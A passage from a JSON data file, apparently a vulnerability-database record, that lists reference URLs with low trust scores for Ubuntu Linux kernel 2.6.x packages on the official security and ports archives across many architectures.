        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-sparc64_2.6.32-22.35_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-307-ec2_2.6.31-307.15_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-22-sparc64_2.6.31-22.60_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-112.28.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-virtual_2.6.28-19.61_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-xen_2.6.24-28.70_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.32-306_2.6.32-306.11_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.84.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.32-306.11_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-generic_2.6.32-22.35_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64_2.6.15-55.84_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-virtual_2.6.28-19.61_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-19-server_2.6.28-19.61_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-generic-pae_2.6.32-22.35_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-virtual_2.6.24-28.70_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.28_2.6.28-19.61_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-qcm-msm/linux-qcm-msm_2.6.31-802.4.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-powerpc-smp_2.6.32-22.35_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-28-sparc64-smp_2.6.24-28.70_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc64-smp_2.6.15-55.84_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-qcm-msm/linux-qcm-msm_2.6.31-802.4.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/squashfs-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-sparc64-smp_2.6.32-22.35_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.32-22.35_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-28-powerpc_2.6.24-28.70_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-server_2.6.24-28.70_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-19.61.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-307.15.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.32-306-ec2_2.6.32-306.11_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.32-205.18.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.31_2.6.31-22.60_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-tools-2.6.32-22_2.6.32-22.35_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/vlan-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-28.70.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-powerpc64-smp_2.6.31-22.60_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-powerpc_2.6.32-22.35_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-virtual_2.6.32-22.35_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22-generic-pae_2.6.31-22.60_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-608.14.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-server_2.6.31-22.60_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-preempt_2.6.32-22.35_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-386_2.6.24-28.70_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-112.28.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ti-omap/linux-ti-omap_2.6.33-501.7.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb"
      },
      {
        "trust": 0.1,
